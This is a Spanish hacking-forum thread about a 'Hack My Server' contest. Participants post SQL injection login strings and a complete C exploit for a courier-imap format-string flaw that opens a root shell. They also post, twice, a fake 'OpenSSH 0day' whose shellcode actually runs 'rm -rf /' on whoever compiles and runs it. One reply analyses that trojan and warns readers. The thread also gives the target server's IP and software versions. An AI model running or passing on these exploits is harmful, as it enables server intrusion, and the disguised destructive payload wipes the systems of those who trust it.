usuario: ' OR 1=1--
pass: '

usuario: admin
pass: pass+union+select+0+from+users

usuario: admin
pass: pass' union select '1','2','3

usuario: 1' having 1=1 --
pass: pass

De todos modos, las he realizado manualmente, en cuanto llegue a casa probaré con Sqlninja por si me arroja algo más...
Tambien haré algunas pruebas con Burp, webscarab y Mantra para intentar modificar los headers de las peticiones HTTP (a ver si suena la flauta y encuentro algo)... Sin embargo, como dije anteriormente, es posible que existan más probabilidades intentando explotar el servicio POPD o IMAPD, necesito indagar más sobre el servidor.

Ah, se me olvidaba... por si alguno habia pensado en utilizar Shodan (y para los que no sepais que es: http://www.shodanhq.com/)
Este servidor no se encuentra en los "radares" de Shodan, cuando se busca por

net:xx.xx.xx.xx
o
hostname:dns-name-servidor

Shodan dice:
Note: Your search for - net:x.x.x.x - did not match any hosts.
Note: Your search for - hostname:dns-name-servidor - did not match any hosts.

Bueno... aun quedan bastantes cosillas por probar a ver si se consigue algo...  ;-) ;-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 7 Mayo 2012, 16:49 pm
Citar
Las vulnerabilidades de SQLi sobre Plesk que se han comentado afectan al Control Panel de Plesk, no afectan al mecanismo de autenticación o la parte pública del gestor, de todos modos he ejecutado las pruebas de SQLi estandar contra el formulario de autenticación (sin exito), en concreto, algunas han sido

Esto quiere decir que para hacer uso de ella hace falta estar logueado ¿Verdad?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: kasiko en 7 Mayo 2012, 16:54 pm
dimitrix, te he enviado un MP


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 7 Mayo 2012, 16:55 pm
Esto quiere decir que para hacer uso de ella hace falta estar logueado ¿Verdad?
Si, solamente con un usuario logueado y en algunas páginas del panel de control, como por ejemplo en la sección de file manager.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 7 Mayo 2012, 17:17 pm
Adastra te añadí un punto :-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 7 Mayo 2012, 17:27 pm
Por ahora...
Realmente ha existido MUCHA participación, aunque me han llegado a pedir la IP unas 100 personas, la verdad es que la gente del foro ha estado compartiendo mucho y eso me gusta.

En cuanto a los ataques primero empezamos verificando el ProFTP y al ver que no es vulnerable la mayoría de ataques fueron hacia PLESK.

Y ahora...
- Ya diré más la IP, todos los mensajes serán borrados.
- Desde el día 7 hasta el 14 repartiré una cuenta PLESK (la misma a todos) para que practiquemos y vayamos explotando la aplicación (no cambiar la contraseña).
- EL día 14 formatearé el servidor y con otra contraseña tendreis que intentar acceder al Plesk para ello cada uno de los participantes me podrá enviar dos links que abriré en un navegador donde esté abierta mi cuenta de PLESK.

- Luego el día 20 lo volveré a formatear y probaremos con ProFTP.

Para pedir la cuenta PLESK...
 - Teneis que haber participado en este POST (y tener la IP).
 - Puedo no aceptar a alguien si creo que no va a participar 'bien'.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 7 Mayo 2012, 17:50 pm
Una pregunta como se consigen puntos?

YO pensaba que no havian puntos sino un ganador ya ya esta.

Bueno gracias por todo.

PD:Este fin de semana me pondre con este reto haber k logro.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 7 Mayo 2012, 17:59 pm
Una pregunta como se consigen puntos?

YO pensaba que no havian puntos sino un ganador ya ya esta.

Bueno gracias por todo.

PD:Este fin de semana me pondre con este reto haber k logro.

Se consiguen puntos ayudando a la gente, participando y buscando y compartiendo...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: shyrh en 7 Mayo 2012, 19:30 pm
Mandame la ip por mp y me apunto


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 7 Mayo 2012, 20:05 pm
Bueno, me parece que he encontrado un exploit para probar. Ahora no tengo tiempo para probarlo, por la noche le cambiare el shellcode y lo probaré.

Parece que es para las versiones que hay instaladas en el servidor.

La verdad no lo iba a publicar y probarlo para ver si comprometia el servidor. Pero como no tengo tiempo y más que nada es para aprender lo comparto.

Código:
/*
  courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit
 
  Author: ktha at hush dot com
 
  Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2
 
  Special thanks goes to andrewg for providing the FreeBSD box.
 
  Greetings: all the guys from irc.pulltheplug.com and irc.netric.org
 
  bash-2.05b$ ./sm00ny-courier_imap_fsx
  courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com
  [*] Launching attack against 127.0.0.1:143
  [+] Got current ebp(5100): 0xbfbfb050
  [+] Got possible saved ebp(3281): 0xbfbfe390
  [+] Got possible write on the stack pointer(3293): 0xbfbfe3c0
  [+] Verifying...failed
  [+] Got possible saved ebp(3286): 0xbfbfe3a4
  [+] Got possible write on the stack pointer(3298): 0xbfbfe3d4
  [+] Verifying...failed
  [+] Got possible saved ebp(3287): 0xbfbfe3a8
  [+] Got possible write on the stack pointer(3299): 0xbfbfe3d8
  [+] Verifying...OK
  [+] Building fmt...done
  [+] Building shellcode...done
  [*] Using ret: 0x8057000
  [*] Using got of fprintf(): 0x804fefc
  [*] Checking for shell..
  uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
   
  N.B. 1. ret can be guessed ;)
     2. got, well.. that's a different story, it must be bruteforced
     3. "ce_number" & "se_number" can be set with some default values when running multiple times
  4. shell is usable for aprox 1 min
   
  [ Need a challenge ? ]
  [ Visit http://www.pulltheplug.com ]
 
*/

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>

#define BIGBUF 2048

#define IMAP_PORT 143

#define END_BRUTEFORCE_STACK 5500

#define TOP_STACK 0xbfc00000 /* FreeBSD */

#define START_BRUTEFORCE_SAVED_EBP 3000

#define JUNK 9

#define GAP_EBP_ESP 48

#define DUMMY_NUMBER 100


void die(int type, char *message) {
 if(type == 2)
 perror(message);
    else
     fprintf(stderr,"%s\n",message);
 exit(1);
}

int connect_to (char *host, int port){
 struct hostent *h;
 struct sockaddr_in c;
 int sock;

 if ((host == NULL) || (*host == (char) 0))
   die(1, "[-] Invalid hostname");

 if ((c.sin_addr.s_addr = inet_addr (host)) == -1){
   if ((h = gethostbyname (host)) == NULL)
  die(1, "[-] Cannot resolve host");
   memcpy ((char *) &c.sin_addr, (char *) h->h_addr, sizeof (c.sin_addr));
 }
 if ((sock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
   die(2,"[-] Error creating socket:");
 c.sin_family = PF_INET;
 c.sin_port = htons (port);
 if (connect (sock, (struct sockaddr *) &c, sizeof (c)) == -1)
   die(2, "[-] Cannot connect: ");
 return sock;
}

void close_socket (int sock){
 shutdown (sock, 2);
 close (sock);
}

char *get_request(char *username, char *password){
 char *request = (char *)malloc(strlen(username)+strlen(password)+20);
 sprintf(request,"1 LOGIN \"%s\" \"%s\"\r\n",username, password);
 return request;
}

void send_data(int sock, char *request){
 int n;
 n = send (sock, request, strlen (request), 0);
 if (n != strlen (request)){
        close_socket (sock);
        die(1, "Error sending request\n");
 }
}


int get_ce_number(char *host, int port){
 int sock;
 int loop;
 char temp[BIGBUF];
 int l,n;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 
 for (loop = END_BRUTEFORCE_STACK;;loop--){
 sock = connect_to(host, port);
 n = recv (sock, temp, sizeof (temp), 0);
 sprintf(password,"sm00ny");
 sprintf(username,"%%%d$p",loop);
 request = get_request(username,password);
 send_data(sock,request);
 memset(temp,0,sizeof(temp));
 n = recv (sock, temp, sizeof (temp), 0);
 close_socket (sock);
 if (n > 0)
  break;
 }
 return loop;
}


int get_se_number(int start, int end, char *host, int port){
 int loop;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 int l,n;
 char temp[BIGBUF];
 int sock;
 if (!start)
 start = START_BRUTEFORCE_SAVED_EBP;
 for (loop = start; loop < end; loop++){
 sock = connect_to(host, port);
 n = recv (sock, temp, sizeof (temp), 0);
 sprintf(password,"sm00ny");
 sprintf(username,"%%%d$n",loop);
 request = get_request(username,password);
 send_data(sock,request);
 memset(temp,0,sizeof(temp));
 n = recv (sock, temp, sizeof (temp), 0);
 close_socket (sock);
 if (n > 0)
  break;
 }
 if (loop == end)
 return -1;
 
 return loop;
}





int verify_se_number(int write, unsigned long addy, int number, char *host, int port){
    char username[BIGBUF];
    char password[BIGBUF];
    char temp[BIGBUF];
    char *request;
    int n, sock;
   
    sock = connect_to(host, port);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    sprintf(password,"sm00ny");
    sprintf(username,"%%%uu%%%u$hn%%%u$hn", (addy & 0xffff) - JUNK, number, write);
    request = get_request(username,password);
    send_data(sock,request);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    close_socket (sock);
    if (n <= 0)
     return 0;
     
    sock = connect_to(host, port);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    sprintf(password,"sm00ny");
    sprintf(username,"%%%u$n%%%u$hn", number, write);
    request = get_request(username,password);
    send_data(sock,request);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    close_socket (sock);
    if (n > 0)
     return 0;
     
    return 1;
}
                                                                           
                                                                           
int *get_format_vector(unsigned long got_addy, unsigned long got, unsigned long ret){
 int i,j,sum,byte;
 int *vec = (int *)malloc(11 * sizeof(int));
 
 sum = JUNK;
 for (i=0; i<2; i++){
 for (j=0; j<2; j++){
  vec[2*(2 * i + j)] = (got_addy & 0xffff) - sum;
  while (vec[2*(2 * i + j)] <= 12)
  vec[2*(2 * i + j)] += 0x10000;
  sum += vec[2*(2 * i + j)];
 
  byte = ((got + 2 * i) >> (16*j)) & 0xffff;
  vec[2*(2 * i + j) + 1] = byte - sum;
  while (vec[2*(2 * i + j) + 1] <= 12)
  vec[2*(2 * i + j) + 1] += 0x10000;
  sum += vec[2*(2 * i + j) + 1];
  got_addy += 2;
 }
 }
 for (i=0; i<2; i++){
 byte = (ret >> (16*i)) & 0xffff;
 vec[8+i] = byte - sum;
 while (vec[8+i] <= 12)
  vec[8+i] += 0x10000;
 sum += vec[8+i];
 }
 
 return vec;
}

char *get_format_string(int *vec, int se_number, int write_number, int got_number){
 char *buf = (char *) malloc(BIGBUF);
 char smallbuf[256];
 int i;
 
 for (i=0; i<4; i++){
 sprintf(smallbuf ,"%%%uu%%%u$hn%%%uu%%%u$hn",vec[2*i],se_number,vec[2*i+1],write_number);
 strcat(buf,smallbuf);
 }
 for (i=0; i<2; i++){
 sprintf(smallbuf,"%%%uu%%%u$hn",vec[8 + i],got_number + i);
 strcat(buf,smallbuf);
 }
 return buf;
}


char *gen_shellcode (int gap){
 int size;
 char *p;
 char shellcode[] =
 /* Thanks ilja */
 "\x31\xc0\x31\xc9\x31\xd2\xb0\x61"
 "\x51\xb1\x06\x51\xb1\x01\x51\xb1"
 "\x02\x51\x8d\x0c\x24\x51\xcd\x80"
 "\xb1\x02\x31\xc9\x51\x51\x51\x80"
 "\xc1\x77\x66\x51\xb5\x02\x66\x51"
 "\x8d\x0c\x24\xb2\x10\x52\x51\x50"
 "\x8d\x0c\x24\x51\x89\xc2\x31\xc0"
 "\xb0\x68\xcd\x80\xb3\x01\x53\x52"
 "\x8d\x0c\x24\x51\x31\xc0\xb0\x6a"
 "\xcd\x80\x31\xc0\x50\x50\x52\x8d"
 "\x0c\x24\x51\x31\xc9\xb0\x1e\xcd"
 "\x80\x89\xc3\x53\x51\x31\xc0\xb0"
 "\x5a\xcd\x80\x41\x53\x51\x31\xc0"
 "\xb0\x5a\xcd\x80\x41\x53\x51\x31"
 "\xc0\xb0\x5a\xcd\x80\x31\xdb\x53"
 "\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
 "\x62\x69\x89\xe3\x31\xc0\x50\x54"
 "\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
 "\xb0\x01\xcd\x80";
                                                                         
 
    size = strlen (shellcode);
 p = (char *) malloc (gap + 1);
 
 /* Some nops ;) */
 memset (p, 0x41, gap);
 
 memcpy (p + gap - size, shellcode, size + 1);
 return p;
}


void root(char *host) {
 fd_set rfds;
    int n;
    int sock;
    char buff[1024];
   
    sock = connect_to(host,30464);
    send(sock,"id;\n",4,0);
    while(1) {
     FD_ZERO(&rfds);
     FD_SET(0, &rfds);
        FD_SET(sock, &rfds);
        if(select(sock+1, &rfds, NULL, NULL, NULL) < 1)
         exit(0);
        if(FD_ISSET(0,&rfds)) {
         if( (n = read(0,buff,sizeof(buff))) < 1)
         exit(0);
         if( send(sock,buff,n,0) != n)
         exit(0);
        }
        if(FD_ISSET(sock,&rfds)) {
         if( (n = recv(sock,buff,sizeof(buff),0)) < 1)
         exit(0);
         write(1,buff,n);
        }
 }
}



main (int argc, char **argv) {
 char *host="127.0.0.1";
 int port = IMAP_PORT;
 int sock;
 
 char *temp1, *temp2;
 char *request;
 int *vec;
 
 int n,ok,i;
 
 unsigned long cur_ebp; // was 5100 on my box
 int ce_number = 0;
 unsigned long saved_ebp; // was 3287 on my box
 int se_number = 0;
 unsigned long write_addy;
 int write_number = 0;
 unsigned long got_addy;
 int got_number = 0;
 
 /* objdump -R /usr/lib/courier-imap/sbin/imaplogin | grep fprintf */
 unsigned long got = 0x0804fefc;
 /* heh.. it's up to you to find this one :P Just use your favourite mathod */
 unsigned long ret = 0x8057000;
 
 if (argc > 1)
  host = argv[1];

 printf("courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com\n");
 
 printf("[*] Launching attack against %s:%d\n",host,port);
 
 if (ce_number == 0)
  ce_number = get_ce_number(host,port);
 cur_ebp = TOP_STACK - 4 * ce_number;
 
 got_number = DUMMY_NUMBER;
 got_addy = cur_ebp + 4 * (got_number - 1);
 
 printf("[+] Got current ebp(%d): %p\n",ce_number,cur_ebp);
 
 do{
  se_number = get_se_number(se_number,ce_number,host,port);
  if (se_number == -1)
  die(1,"[-] Failed to get a saved_ebp !");
 
  saved_ebp = cur_ebp + 4 * (se_number - 1);
  printf("[+] Got possible saved ebp(%d): %p\n",se_number,saved_ebp);
 
  write_addy = GAP_EBP_ESP + saved_ebp;
  write_number = (write_addy - cur_ebp) / 4 + 1;
 printf("[+] Got possible write on the stack pointer(%d): %p\n",write_number,write_addy);
 
  printf("[+] Verifying...");
  ok = verify_se_number(write_number,got_addy,se_number,host,port);
  if (ok)
  printf("OK\n");
  else {
  printf("failed\n");
  se_number++;
  }
 }while (!ok);
 
 printf("[+] Building fmt...");
 vec = get_format_vector(got_addy,got,ret);
 temp1 = get_format_string(vec,se_number,write_number,got_number);
 printf("done\n");
 
 printf("[+] Building shellcode...");
 temp2 = gen_shellcode(800);
 printf("done\n");
 
 printf("[*] Using ret: %p\n",ret);
 printf("[*] Using got of fprintf(): %p\n",got);
 
 request = get_request(temp1,temp2);
 
 sock = connect_to(host, port);
 send_data(sock,request);
 sleep(2);
 close_socket (sock);
 
 printf("[*] Checking for shell..\n");
 root(host);
}

Se tienen que cambiar tres o cuatro cosas por lo que veo a simple vista. En el aviso de seguridad no especifica que sea solo para freebsd y puesto que es un format string, cambiando los valores de la pila que utiliza seguramente funcionará.

Nada que os divirtáis probando xD

Respecto al Plesk 10.2, no he encontrado ningun fallo que pueda ser explotado sin credenciales. Bueno tal vez uno en openssl, pero no he investigado más.

Encontré un fallo en el postfix http://www.postfix.org/CVE-2011-0411.html, pero es para ser explotado con mitm ya que es un fallo en la conexión TLS.

A ver si hay suerte.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: vanchopper en 7 Mayo 2012, 20:24 pm
IP , por favor.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 7 Mayo 2012, 22:25 pm
Gracias m0rf
Era justo el mismo exploit que estaba revisando...  :xD :xD :xD
Pero existe un problema... el servidor tiene una versión del kernel superior a la 2.6.7 y tiene activado el ASLR (Stack Randomization), por lo tanto no sabemos cual es el valor que asumirá la stack en cada ejecución al ser está dinámica, en consecuencia cuando se ejecuta se obtiene algo como lo siguiente

Código:
courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com
[*] Launching attack against 85.214.226.180:143
[+] Got current ebp(5500): 0xbfbfaa10
[+] Got possible saved ebp(3000): 0xbfbfd8ec
[+] Got possible write on the stack pointer(3012): 0xbfbfd91c
[+] Verifying...failed
[+] Got possible saved ebp(3001): 0xbfbfd8f0
[+] Got possible write on the stack pointer(3013): 0xbfbfd920
[+] Verifying...failed
[+] Got possible saved ebp(3002): 0xbfbfd8f4
[+] Got possible write on the stack pointer(3014): 0xbfbfd924
[+] Verifying...failed
[+] Got possible saved ebp(3003): 0xbfbfd8f4
[+] Got possible write on the stack pointer(3015): 0xbfbfd928
[+] Verifying...failed
......
.....

Se ha partido la posición 0xbfbfaa10 pero claro, esa posición es para FreeBSD, en este caso concreto se desconoce cual será la posición en la que se encuentra la stack para el proceso del servicio, (por el tema de ASLR, ver: http://en.wikipedia.org/wiki/Address_space_layout_randomization)

Supongo que si se logra evadir o determinar de alguna forma la posición de la stack para el servicio, será suficiente para que el exploit funcione... a ver si hay alguien que se le ocurra como hacerlo, ya que si se consigue, se logrará acceder al servidor.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h1t en 7 Mayo 2012, 23:58 pm
He indagado un poco por la red y he encontrado un exploit de openssh que me queda por probarlo pero la hora que es no me da tiempo jajajaja. Os lo dejo por aquí a ver si le echais un vistazo y lo probais y tal.
Código:
/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }

Lo he extraido de un foro que por si las moscas no pongo la url por que no se si se podría tratar de spam o no no me queda claro jejeje, si por algún casual se tiene que poner pues indicadmelo y lo pongo sin problemas.

Saludoss y ánimo que esto lo sacamos entre todos jajajjaa.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 8 Mayo 2012, 00:12 am
Hola h1t.

 :D :D :D
Ya he probado tu exploit, resultado:


Citar
>gcc -o salidaSSH exploitSSH.c
>./salidaSSH
MIKU! MIKU! MIKU!

   
  • HATSUNEMIKU
  • OpenSSH <= 5.3p1 remote root 0day exploit
  • By: n3xus
  • Greetz to hackforums.net
  • Keep this 0day priv8!
  • usage: ./salidaSSH <target> <port>

> ./salidaSSH x.x.x.x 22
MIKU! MIKU! MIKU!
[-] Exploit failed.
Violación de segmento

El exploit falla, sin embargo se trata de un 0day para versiones recientes de SSH, en concreto en que foro lo haz visto? y cual es la vulnerabilidad que explota?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 8 Mayo 2012, 00:36 am
He indagado un poco por la red y he encontrado un exploit de openssh que me queda por probarlo pero la hora que es no me da tiempo jajajaja. Os lo dejo por aquí a ver si le echais un vistazo y lo probais y tal.
Código:
/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }

Lo he extraido de un foro que por si las moscas no pongo la url por que no se si se podría tratar de spam o no no me queda claro jejeje, si por algún casual se tiene que poner pues indicadmelo y lo pongo sin problemas.

Saludoss y ánimo que esto lo sacamos entre todos jajajjaa.


MMMMMMM ESE EXPLOIT NO FUNCIONA...
Y un consejo.... Si cogeis exploits de webs, al menos leer la explicacion... o intentar entender el código y no compileis y lanceis por que quizas algún día os lleveis un susto... O al menos corrobar con muchas webs para ver si el exploit es fiable o algo.....

http://www.tamonten.com/how-not-to-exploit-a-box
Ahi teneis una web donde hablan del exploit y de su análisis
Sacado de esa web de la explicación de ese exploit:
Citar
converting the shellcode to ascii:

docoder
j?X?Rj/??Rfh-f???Rfh-r??Rh//rmh/bin??RWVQS????

rootshell
1????ou!?Q?ck yQf?fufQ1???1???1?????1?1?@??

The only real strings I can pull out of that are in the decoder section. Namely "/","-f","-r","/rm","/bin"

Or to put it another way "/bin","/rm","-r","-f","/"

Those are not strings I want to see in code I'm running on my box

Luckily the pentester in question was saved by the fact that "rm -rf /" doesn't work on modern distros, but he was only a "--no-preserve-root" away from a dead box.



EDITO: Dimitrix, el usuario en el plesk te lo tenemos que pedir por privado, o nos lo iras mandando tú cuando este creado ?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 8 Mayo 2012, 01:05 am
Encontre una vulnerabilidad para el curier-imapd y el curier-pop3d pero es para Gentoo Linux  :-(
Y vi una vulnerabilidad para poppassd pero con el poco ingles que tengo creo que no se puede aplicar a este servidor por si acaso alguien encuentra algo que yo no haya visto en la info aqui la dejo

http://www.cvedetails.com/cve/CVE-2007-2173/
http://www.derkeiler.com/Mailing-Lists/Securiteam/2003-04/0077.html


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 8 Mayo 2012, 02:29 am
Creo que alguien mas atras ya lo dijo pero tambien encontre una vulnerabilidad creo estar 100% de que es aplicable a este servidor y es un man in the middle pero no se hacerlo ademas dentro de este pdf estan explicadas las distintas formas de distintos metodos para realizar el atacke asiq alguien mas experimentado en ese ambito que se anime ahi esta la fuente http://www.g-sec.lu/practicaltls.pdf


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 8 Mayo 2012, 02:58 am

MMMMMMM ESE EXPLOIT NO FUNCIONA...
Y un consejo.... Si cogeis exploits de webs, al menos leer la explicacion... o intentar entender el código y no compileis y lanceis por que quizas algún día os lleveis un susto... O al menos corrobar con muchas webs para ver si el exploit es fiable o algo.....

http://www.tamonten.com/how-not-to-exploit-a-box
Ahi teneis una web donde hablan del exploit y de su análisis
Sacado de esa web de la explicación de ese exploit:
EDITO: Dimitrix, el usuario en el plesk te lo tenemos que pedir por privado, o nos lo iras mandando tú cuando este creado ?

Perdona pero de webs?

Lo he sacado de aquí: http://www.securityfocus.com/bid/10976/exploit

Yo no he compilado nada porque ya sabia que el exploit no funcionaria pero si creo que se podria modificar para que funcionara con otros sistemas operativos.

Si buscas en este mismo foro hay dos temas que hablan de este exploit...

Yo de ti buscaria sobre el exploit antes de cuestionar su procedencia.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 8 Mayo 2012, 10:35 am
Perdona pero de webs?

Lo he sacado de aquí: http://www.securityfocus.com/bid/10976/exploit

Yo no he compilado nada porque ya sabia que el exploit no funcionaria pero si creo que se podria modificar para que funcionara con otros sistemas operativos.

Si buscas en este mismo foro hay dos temas que hablan de este exploit...

Yo de ti buscaria sobre el exploit antes de cuestionar su procedencia.


m0rf tio.... no iba por ti XDD
te has molestado en leer el exploit que cite? y en ver la página que puse? XD
No es el mismo que el que has puesto tu de security focus es el del sshd... Fíjate....
Saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 8 Mayo 2012, 11:06 am
Linux (IP) 2.6.18-028stab091.2 #1 SMP Fri Jun 3 00:02:40 MSD 2011 i686
PHP Version 5.3.2-1ubuntu4.14


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h1t en 8 Mayo 2012, 11:11 am
Hola h1t.

 :D :D :D
Ya he probado tu exploit, resultado:


El exploit falla, sin embargo se trata de un 0day para versiones recientes de SSH, en concreto en que foro lo haz visto? y cual es la vulnerabilidad que explota?


Bueno tengo que pedir disculpas por ese código tenia tanta prisa que ni siquiera me paré a observarlo un poco. lo saqué de esta web  http://forum.guiadohacker.com.br/showthread.php?t=11113 (http://forum.guiadohacker.com.br/showthread.php?t=11113)

EDITO: voy a echarle un ratito ahora a ver si logro sacar algo, posteo si tengo avances.

: )


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 8 Mayo 2012, 11:14 am
